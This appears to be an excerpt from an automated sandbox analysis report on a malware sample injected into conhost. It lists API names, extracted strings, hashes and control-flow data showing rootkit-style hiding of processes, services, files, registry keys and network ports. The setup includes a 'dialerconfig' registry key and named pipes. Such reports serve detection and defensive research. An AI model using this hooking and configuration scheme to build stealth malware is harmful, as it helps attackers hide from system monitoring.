                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 1534210851-0
                                                                                                    • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                    • Instruction ID: 68ceee461f84b91ee897fb2f3fd1fd013f45c2be58136839a5f77f4a6f83e860
                                                                                                    • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                    • Instruction Fuzzy Hash: 0D312335A80A01D1FF529F36D6E8BDA92B4AB4EFE0F25D421DE0987795DE24CC608A50

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622576710.000001C08C180000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C08C180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c180000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                    • Instruction ID: 574058dba5a5ce5790424de62c53ed01ec80c47c7b8ef65667ae4150bf08fe0c
                                                                                                    • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                    • Instruction Fuzzy Hash: F9610F72B46652C7FEAACF15D480BA8B3A1FB0AF95F54C031DA1907B85DB38E852C700

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 203 1c08c1b2cdc-1c08c1b2d55 call 1c08c1cecc0 206 1c08c1b2d5b-1c08c1b2d61 203->206 207 1c08c1b3090-1c08c1b30b3 203->207 206->207 208 1c08c1b2d67-1c08c1b2d6a 206->208 208->207 209 1c08c1b2d70-1c08c1b2d73 208->209 209->207 210 1c08c1b2d79-1c08c1b2d89 GetModuleHandleA 209->210 211 1c08c1b2d8b-1c08c1b2d9b call 1c08c1c3090 210->211 212 1c08c1b2d9d 210->212 214 1c08c1b2da0-1c08c1b2dbe 211->214 212->214 214->207 217 1c08c1b2dc4-1c08c1b2de3 StrCmpNIW 214->217 217->207 218 1c08c1b2de9-1c08c1b2ded 217->218 218->207 219 1c08c1b2df3-1c08c1b2dfd 218->219 219->207 220 1c08c1b2e03-1c08c1b2e0a 219->220 220->207 221 1c08c1b2e10-1c08c1b2e23 220->221 222 1c08c1b2e33 221->222 223 1c08c1b2e25-1c08c1b2e31 221->223 224 1c08c1b2e36-1c08c1b2e3a 222->224 223->224 225 1c08c1b2e4a 224->225 226 1c08c1b2e3c-1c08c1b2e48 224->226 227 1c08c1b2e4d-1c08c1b2e57 225->227 226->227 228 1c08c1b2f4d-1c08c1b2f51 227->228 229 1c08c1b2e5d-1c08c1b2e60 227->229 230 1c08c1b3082-1c08c1b308a 228->230 231 1c08c1b2f57-1c08c1b2f5a 228->231 232 1c08c1b2e72-1c08c1b2e7c 229->232 233 1c08c1b2e62-1c08c1b2e6f call 1c08c1b1a14 229->233 230->207 230->221 234 1c08c1b2f6b-1c08c1b2f75 231->234 235 1c08c1b2f5c-1c08c1b2f68 call 1c08c1b1a14 231->235 237 1c08c1b2e7e-1c08c1b2e8b 232->237 238 1c08c1b2eb0-1c08c1b2eba 232->238 233->232 242 1c08c1b2f77-1c08c1b2f84 234->242 243 1c08c1b2fa5-1c08c1b2fa8 234->243 235->234 237->238 245 1c08c1b2e8d-1c08c1b2e9a 237->245 239 1c08c1b2eea-1c08c1b2eed 238->239 240 1c08c1b2ebc-1c08c1b2ec9 238->240 247 1c08c1b2efb-1c08c1b2f08 lstrlenW 239->247 248 1c08c1b2eef-1c08c1b2ef9 call 1c08c1b1d28 239->248 240->239 246 1c08c1b2ecb-1c08c1b2ed8 240->246 242->243 250 1c08c1b2f86-1c08c1b2f93 242->250 251 1c08c1b2faa-1c08c1b2fb3 call 1c08c1b1d28 243->251 252 1c08c1b2fb5-1c08c1b2fc2 lstrlenW 243->252 253 1c08c1b2e9d-1c08c1b2ea3 245->253 256 1c08c1b2edb-1c08c1b2ee1 246->256 258 1c08c1b2f2b-1c08c1b2f3d call 1c08c1b3930 247->258 259 1c08c1b2f0a-1c08c1b2f14 247->259 248->247 263 1c08c1b2f43-1c08c1b2f48 248->263 260 1c08c1b2f96-1c08c1b2f9c 250->260 251->252 270 1c08c1b2ffa-1c08c1b3005 251->270 254 1c08c1b2fe5-1c08c1b2fef call 1c08c1b3930 252->254 255 1c08c1b2fc4-1c08c1b2fce 252->255 262 1c08c1b2ea9-1c08c1b2eae 253->262 253->263 265 1c08c1b2ff2-1c08c1b2ff4 254->265 255->254 264 1c08c1b2fd0-1c08c1b2fe3 call 1c08c1b1554 255->264 256->263 266 1c08c1b2ee3-1c08c1b2ee8 256->266 258->263 258->265 259->258 269 1c08c1b2f16-1c08c1b2f29 call 1c08c1b1554 259->269 260->270 271 1c08c1b2f9e-1c08c1b2fa3 260->271 262->238 262->253 263->265 264->254 264->270 265->230 265->270 266->239 266->256 269->258 269->263 277 1c08c1b307c-1c08c1b3080 270->277 278 1c08c1b3007-1c08c1b300b 270->278 271->243 271->260 277->230 281 1c08c1b300d-1c08c1b3011 278->281 282 1c08c1b3013-1c08c1b302d call 1c08c1b86a0 278->282 281->282 284 1c08c1b3030-1c08c1b3033 281->284 282->284 286 1c08c1b3056-1c08c1b3059 284->286 287 1c08c1b3035-1c08c1b3053 call 1c08c1b86a0 284->287 286->277 290 1c08c1b305b-1c08c1b3079 call 1c08c1b86a0 286->290 287->286 290->277
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                    • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                    • API String ID: 2119608203-3850299575
                                                                                                    • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                    • Instruction ID: e5384dc9f26e6f692084fd63c054772a28567d692bc78afb4e14bf39fce11ea9
                                                                                                    • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                    • Instruction Fuzzy Hash: 2AB17E72A50A50C1FFA69F26D480BE9A3B4FB4AFA4F94901AEE0953794DF35CC54CB40

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3140674995-0
                                                                                                    • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                    • Instruction ID: 52578243787ff22093cbbdfe51c71ec01a7b89e3fcea8ca852e770a15c5a5a00
                                                                                                    • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                    • Instruction Fuzzy Hash: 89313C72644A80C5FB619F60E880BD97370F789B54F44842AEA4D47A98EF38C948CB10
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1239891234-0
                                                                                                    • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                    • Instruction ID: 192fe8def0747c66c9966677678a13e2ea7825cd74f390ec4d09b643b8cb8cc1
                                                                                                    • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                    • Instruction Fuzzy Hash: 3F316D36644B80C6EB61CF25E880BDE73B4F78AB64F508116EA9D43B99DF38C945CB00
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                    • String ID:
                                                                                                    • API String ID: 1443284424-0
                                                                                                    • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                    • Instruction ID: 2af1099ed1f54c5930f89af15b7a8bdb4cbd9863cf787fb34e304f066d7587b8
                                                                                                    • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                    • Instruction Fuzzy Hash: 15E1D072B94A80CAFB02CF64E4C06DD7BB1F34AF98F548116EE5A57B99DA34C916C700

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                    • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                    • API String ID: 106492572-2879589442
                                                                                                    • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                    • Instruction ID: 37e61d1c893b152ff257292813f8f67e88616a79ab9d33da1a821b562a5bd39e
                                                                                                    • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                    • Instruction Fuzzy Hash: CB712736A90E40C6FF129F61E8D0AD9A3B4FB8EF98F519111EA4D43A28DF38C855C700

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                    • String ID: d
                                                                                                    • API String ID: 2005889112-2564639436
                                                                                                    • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                    • Instruction ID: e1f01fb367381824d08459acef72d691b855000535abc4f25b7592be426eee0d
                                                                                                    • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                    • Instruction Fuzzy Hash: D85159B2A94B44D6FB15CB62E584BDAB3B1F78AF90F558124EA4A07B14DF38C465CB00

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                    • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                    • API String ID: 4175298099-1975688563
                                                                                                    • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                    • Instruction ID: c78f4b14ab89c88cd34d50ede6f5b09523ef9eca4af47476978709177122e9a9
                                                                                                    • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                    • Instruction Fuzzy Hash: 36316FB09C194AE0FF4BEB65E8D2ED42331AB4FB54FC0D513A519122769E38CA4DC790

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                    • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                    • API String ID: 2171963597-1373409510
                                                                                                    • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                    • Instruction ID: 78fad9975ff790711cb006281104e8d72ba61fb3ed6ce6f497d0e70c5ba33a2d
                                                                                                    • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                    • Instruction Fuzzy Hash: 33211076A94B40C2FB118B25E58879977B0F78AFA4F908215EA5942FA8DF3CC559CF00

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                    • String ID: d
                                                                                                    • API String ID: 3743429067-2564639436
                                                                                                    • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                    • Instruction ID: 9cf1e939b2fa242f7ef8c976bf2ebc2a8242314b63cb942b5188d1c1e5250b37
                                                                                                    • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                    • Instruction Fuzzy Hash: 1A419273654B80DBEB618F61E484BDAB7B1F38AB94F508125EB8907B54DF38C564CB00

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622576710.000001C08C180000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C08C180000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c180000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                    • String ID:
                                                                                                    • API String ID: 190073905-0
                                                                                                    • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                                    • Instruction ID: 601e834268a8c8e5a9ee7ca4c858c56ec369cb53ef0f1416d94c96a1f27f854a
                                                                                                    • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                                    • Instruction Fuzzy Hash: EF81BE31E88641C6FE57AB2598E1FD96AF0EB4FF80F94C035EA6547796DB38C8468300

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                    • String ID:
                                                                                                    • API String ID: 190073905-0
                                                                                                    • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                                    • Instruction ID: 162328503974b270ea54638007661105da54cb56bc323e4bfaa36a24ec41a532
                                                                                                    • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                                    • Instruction Fuzzy Hash: 90818131FC4241C6FE57AB2698C1BD962B0AB8FFA0F54C415AA0547FD6DA38CC518FA0

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                    • String ID: api-ms-
                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                    • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                    • Instruction ID: 304617a1dcf7ca27d0f54ce4db2857c15162b80c90fa435c300479710c26edfb
                                                                                                    • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                    • Instruction Fuzzy Hash: A9318431A92B94D1FE53DB12A480BD963B4B74EFB0F598525ED2D47394EF38C8568B00

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                    • String ID: CONOUT$
                                                                                                    • API String ID: 3230265001-3130406586
                                                                                                    • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                    • Instruction ID: e4d0f680c01a84c457105b048380fb5d193eb88c1a6e07265eaf8a5ce9d678cd
                                                                                                    • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                    • Instruction Fuzzy Hash: C9119071BD4B40C6FB518B42E884B99A2B0F38EFE4F508214FA5D87794CF38C5148744

                                                                                                     Control-flow Graph (graph rendering not preserved): function at 1c08c1b5c10, basic blocks 581-651; imported APIs on the graph: GetCurrentThreadId, GetThreadContext, SetThreadContext, VirtualProtect, FlushInstructionCache, ResumeThread
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$Current$Context
                                                                                                    • String ID:
                                                                                                    • API String ID: 1666949209-0
                                                                                                    • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                                    • Instruction ID: c4a2ccf7e2aa8210281e54176d59ed69d8855722abcb0cb655ecceb3da959ed4
                                                                                                    • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                                    • Instruction Fuzzy Hash: E0D18A76648B88C1EA719B1AE49479AB7B0F38DF94F104216EA8D47BA5DF38C941CF10
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocFree
                                                                                                    • String ID: dialer
                                                                                                    • API String ID: 756756679-3528709123
                                                                                                    • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                    • Instruction ID: 0251515d02cc1ba95587aa0360f2d41a0f9f3b498e748d4370d9d5140b82874f
                                                                                                    • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                    • Instruction Fuzzy Hash: F4317171B81B51D6FF169F16A884AE963B4FB4BFA4F44C1209E4847B54EF38C8A58B00
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 517849248-0
                                                                                                    • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                                    • Instruction ID: 9559057fc3131046e5e1fb3f7dc394c21a2adf77cf79603a44d122dd742f6254
                                                                                                    • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                                    • Instruction Fuzzy Hash: 2A015B31B80A81D6FB11DB22A498BD9A3A1F78EFD0F988035DE8943754DE38C9858700
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 449555515-0
                                                                                                    • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                                    • Instruction ID: 661bfaecf9869579411b269240244c5344ff0ba2e323b443e9a157aea630b4a2
                                                                                                    • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                                    • Instruction Fuzzy Hash: 98115B75B81B40C6FF229B21E489BDA62B0BB4EF81F448528E94907754EF3CC4288B00
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                    • String ID: csm$f
                                                                                                    • API String ID: 2395640692-629598281
                                                                                                    • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                                    • Instruction ID: 1612ce3222621c4531d352f6cc773b3a87b7d032152159d1f514e93b2e9c6cb0
                                                                                                    • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                                    • Instruction Fuzzy Hash: 80514932A91A00CAFF56DB15E484F9937B5F35AFB8F51C1609A1A47788DB39DC42CB00
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                    • String ID: csm$f
                                                                                                    • API String ID: 2395640692-629598281
                                                                                                    • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                                    • Instruction ID: 5421432192e96bdd30f0c7d7351afc07d885a1d323534473e34d4e4e39b95996
                                                                                                    • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                                    • Instruction Fuzzy Hash: 8D318B32A90640D6FB16EF11E888B9937B5F74BFA8F15C114AE5A07785DB38CD42DB04
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FinalHandleNamePathlstrlen
                                                                                                    • String ID: \\?\
                                                                                                    • API String ID: 2719912262-4282027825
                                                                                                    • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                                    • Instruction ID: 477f49a618cdd8302df4cf0a96b8f2fdcdd5e76cacab9f2374ce03d785feef5a
                                                                                                    • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                                    • Instruction Fuzzy Hash: B9F04F72784641D2FF618B21F5D5BD9A770F74EF98F84C020DA4946964DE2CCA88CB00
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CombinePath
                                                                                                    • String ID: \\.\pipe\
                                                                                                    • API String ID: 3422762182-91387939
                                                                                                    • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                                    • Instruction ID: daccc836350de90d9e00e79c3f00942a12ea97954eec63f927974d0c25f90db3
                                                                                                    • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                                    • Instruction Fuzzy Hash: 8FF08C30B84B80D2FE018B13B9855D9A230EB8EFD0F88D131EE9A07B68CE2CC4918700
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000029.00000002.2622635464.000001C08C1B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C08C1B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_41_2_1c08c1b0000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                    • Instruction ID: 3f8d8aa097531b29afdfbce5282b0010faf69b074d717b40c544a0f8e7703db8
                                                                                                    • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                    • Instruction Fuzzy Hash: 5FF08271B91B40D1FF864B60E8C4BE42770EB4EF90F44E019A50F45560CF38C499CB00
                                                                                                    APIs
                                                                                                    Memory Dump Source
